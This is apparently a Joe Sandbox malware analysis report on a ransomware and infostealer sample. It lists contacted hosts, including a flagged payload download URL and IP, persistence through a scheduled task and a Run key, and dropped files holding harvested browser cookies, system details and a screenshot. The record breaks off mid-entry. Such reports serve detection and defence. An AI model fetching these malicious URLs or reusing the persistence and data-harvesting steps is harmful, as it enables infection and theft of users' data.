http://www.amazon.com/	Q5W0I0pzFI.exe, 00000008.00000003.460246931.0000000003030000.00000004.00001000.00020000.00000000.sdmp	false		high
https://t.me/hi20220328U	build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	false		high
http://5.252.23.88/nss3.dll)b	build2.exe, 00000010.00000002.537111243.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.twitter.com/	Q5W0I0pzFI.exe, 00000008.00000003.464848669.0000000003030000.00000004.00001000.00020000.00000000.sdmp	false		high
https://we.tl/t-0S984cQ4	Q5W0I0pzFI.exe, 00000008.00000002.628529246.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000003.534896243.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonLOjP	Q5W0I0pzFI.exe, 00000009.00000002.440476743.0000000000778000.00000004.00000020.00020000.00000000.sdmp	false		high
https://we.tl/t-0S984cQ4B3	Q5W0I0pzFI.exe, 00000008.00000002.628529246.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000003.534896243.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000002.628911311.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	Q5W0I0pzFI.exe, 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	build2.exe, 00000010.00000002.569389532.0000000032DDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/Root	Q5W0I0pzFI.exe, 00000009.00000002.440476743.0000000000778000.00000004.00000020.00020000.00000000.sdmp	false		high
http://fuyt.org/files/1/build3.execm	Q5W0I0pzFI.exe, 00000008.00000002.629017228.0000000002F82000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	Q5W0I0pzFI.exe, 00000000.00000002.372586217.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000A.00000002.419401145.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 0000000F.00000002.447804234.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.2ip.ua/geo.jsont	Q5W0I0pzFI.exe, 00000009.00000002.440476743.0000000000778000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.youtube.com/	Q5W0I0pzFI.exe, 00000008.00000003.468365539.0000000003030000.00000004.00001000.00020000.00000000.sdmp	false		high
http://5.252.23.88/vcruntime140.dll~L	build2.exe, 00000010.00000002.537111243.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/vv	build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/H6	Q5W0I0pzFI.exe, 00000009.00000002.440476743.0000000000778000.00000004.00000020.00020000.00000000.sdmp	false		high
http://fuyt.org/files/1/build3.exe&	Q5W0I0pzFI.exe, 00000008.00000002.629017228.0000000002F82000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.wikipedia.com/	Q5W0I0pzFI.exe, 00000008.00000003.466497367.0000000003030000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.live.com/	Q5W0I0pzFI.exe, 00000008.00000003.462332003.0000000003030000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.reddit.com/	Q5W0I0pzFI.exe, 00000008.00000003.464032318.0000000003030000.00000004.00001000.00020000.00000000.sdmp	false		high
https://activity.windows.com	Q5W0I0pzFI.exe, 00000008.00000003.536965023.0000000000720000.00000004.00001000.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	build2.exe, 00000010.00000002.569389532.0000000032DDC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/	Q5W0I0pzFI.exe, 00000008.00000003.461865402.0000000003030000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.252.23.88	unknown	Russian Federation	48430	FIRSTDC-ASRU	true
162.0.218.244	api.2ip.ua	Canada	35893	ACPCA	false
183.78.205.92	fuyt.org	Korea Republic of	9698	YOUNGDOONG-AS-KRLGHelloVisionCorpKR	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	598825
Start date and time:	2022-03-29 04:49:49 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Q5W0I0pzFI (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.evad.winEXE@30/275@8/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 63.2% (good quality ratio 58.8%) Quality average: 78.7% Quality standard deviation: 30.4%
HCA Information:	Successful, ratio: 91% Number of executed functions: 67 Number of non-executed functions: 200
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing behavior and disassembly information.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:51:16	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe s>--Task
06:51:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
06:51:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
06:51:29	API Interceptor	1x Sleep call for process: Q5W0I0pzFI.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\d06ed635-68f6-4e9a-955c-4899f5f57b9a3303128020.zip

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	80135
Entropy (8bit):	7.987700628023517
Encrypted:	false
SSDEEP:	1536:rrpzOVPHzoAVOa/NmpOwMF52pfh/D47GLtWi03rQc0GlOzO:rriPdVJm4wo58/D4IWi07Qc0GIzO
MD5:	FDC70F09ACB4E3CDD817582314B92680
SHA1:	1AB6EC8A1E842C9F32C0AF9E45F980B1F0CAABCC
SHA-256:	3B4E9C12A7749BFC1347D356A33FD65EEEBF2E97FE81444217990ED706FD410C
SHA-512:	D3ED3FE2D6A7D885E888F7F6224E2450D5F8B6B803EFF73D67F0E16116CA60129E8169E0DB800B4457A43482ADF8DAEEA966542D13CB1A3FA709461BFC41B018
Malicious:	false
Reputation:	unknown
Preview:	PK.........n}T............#.../Autofill/Google Chrome_Default.txtUT.....Cb..Cb..Cb..PK.........n}T................/CC/Google Chrome_Default.txtUT.....Cb..Cb..Cb..PK........tn}T................/Cookies/Edge_Cookies.txtUT.....Cb..Cb..Cb..PK.........n}TT.2.........".../Cookies/Google Chrome_Default.txtUT.....Cb..Cb..Cb-..n. ...K.)t....%H...".ysV.W..5D....]..j.u.w..=z.e.=.!.P......x..>.E.V1.:=.E>R.QSD.U..k.....N..:;]~j.......l,.A..!S_.L.A..pS..'.\|.wjOi..a...6g..<...mw....I4.X..F4o'.....s.Kz..^o..[q..-...PK........tn}T................/Cookies/IE_Cookies.txtUT.....Cb..Cb..Cb..PK.........n}T............$.../Downloads/Google Chrome_Default.txtUT.....Cb..Cb..Cb..PK.........n}T................/Files/DESKTOP.zipUT.....Cb..Cb..CbPK....................PK.........n}T............".../History/Google Chrome_Default.txtUT.....Cb..Cb..Cb..PK.........n}T....p...Q......./information.txtUT.....Cb..Cb..Cb.Z.r.........H........DY....H.fM.*H.g;}..]....@.%R.%H.Hm.M&3....sH~.&....8i.f..8.2.A.S.z

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Cookies\Google Chrome_Default.txt

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.753991094325761
Encrypted:	false
SSDEEP:	6:PkopYjdhX0/tbD2Pdp9TaMbl/XyXqkxcP/Zy:copYxhHveaPx4cP/o
MD5:	01E689A15E7D09E945EE1A10E65740D9
SHA1:	75DAB7380AD6D001CD397F8C3D19CDE76AF4FF62
SHA-256:	8A7A8D8659BF0FE6BAF6DE8CCA6C8A8D0CCA6E7511DD9321660945A53C21C16D
SHA-512:	ADB9D0923A2EDB40105B0777880575BF5933462805E02C32BE9593DF086FF530C000392930F82D4C53B9112ED79BC351677028CBBAC84AFFA1CFD4EDED9EEE19
Malicious:	false
Reputation:	unknown
Preview:	.google.com.FALSE./.FALSE.1617282895.NID.204=lnU8rUIoxvWmSnStHN12ZO72aUiWVV1axeN4DtOTKTfvcrldjVWnMTIQIS8iJiRN9UHb6IUY-QDONDNofBZR-n0DF-PM3FrKHL6vfmJVykmJ7r1MH14-Wacprxo-dlNZMAV5ps4W2FLalvE0BMvycvUBSFkTfeWy7vzxBOBIFRE..

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Files\DESKTOP.zip

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	22
Entropy (8bit):	1.0476747992754052
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Reputation:	unknown
Preview:	PK....................

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\information.txt

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	ISO-8859 text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	11857
Entropy (8bit):	5.248607304792596
Encrypted:	false
SSDEEP:	96:tuxE+OIOf+R0rQLiYJO4Set9JxzwNpOZKtDplCdMT8IuR5BHIxqzL9HBcIu9JF9S:iBOIOGurQdO4btdpgBdQXRsg8qbNqqN
MD5:	846C9885A1DE898D1FC6D5C332957CE7
SHA1:	816FF11590F364F92467727EC1B2402DEE68C106
SHA-256:	81D92D1E20865A71A79F305362CE6A9A085E5F47A78F8A7D75DD1C43153A8A55
SHA-512:	1F6D0E2353BD139EBD379ACE47A2EA62B8B12648EB9821E121B951A681F7B1F4C79F63324E683A452F81CCE5C3522662440DA922B4B70EC83D560E52F9B03FF5
Malicious:	false
Reputation:	unknown
Preview:	Version: 51.2....Date: Tue Mar 29 06:52:12 2022..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe ..Work Dir: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ ....Windows: Windows 10 Pro [x64]..Computer Name: 238576..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 29/3/2022 6:52:12..TimeZone: UTC-8....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [300]..- csrss.exe [392]..- wininit.exe [468]..- csrss.exe [484]..- winlogon.exe [564]..- services.exe [604]..- lsass.exe [612]..- fontdrvhost.exe [692]..- fontdrvhost.exe [700]..- svchost.exe [716].

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\screenshot.jpg

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	79554
Entropy (8bit):	7.887076447608307
Encrypted:	false
SSDEEP:	1536:C1n4uEekw8fc0IfhMezAnw7vsF+uY0Z4feV3Vw1RNodrmcxZvjfJ3B0ubzDY5gx+:tIl8c0YhMezQF+uYqmeXf1ZvlRNbzDR4
MD5:	C7FF95A23A0139508C356BB4F55294C2
SHA1:	2DEDB6DB4781FF5CDC4D55AF38DEC06191634CFB
SHA-256:	3BB63876331568421015B721518024DF2DCF1362E5B178EB3F682B032B05DF9A
SHA-512:	057A9522E529206B25003CA195C6DE8F2C1CEBEE868F15E20E8EEA117F57E5AD1756C4CEB06EB22DE8A9B89FE50F24EAD46279D6B1E526FF247437F225D32374
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.\|..).?.H.'.\|....).?m.....h.t......\|4.%......

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\temp

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\SystemID\PersonalID.txt

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.957444505957562
Encrypted:	false
SSDEEP:	3:oHDj6iRoU6XZyn:qDj6Zyn
MD5:	A098FEF22A11606E1D08F073962E8BF3
SHA1:	0E76EF107B9BC64EC7793161CB859554A010F300
SHA-256:	8458BEC5CD41910C6CF34B6BE1B6B27F2AD9402C9193B01FDC346088E1162FF0
SHA-512:	97DD9E2643FAB0402BAAFFF17D26FE986F0ED3143BDB615EA1A347739F4432954BCDFC97AFA27CA576E68EC509407137BE2C85EEE9E4C05E4D61A72CF3D482FA
Malicious:	false
Reputation:	unknown
Preview:	xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh..

C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	MS-DOS executable
Category:	dropped
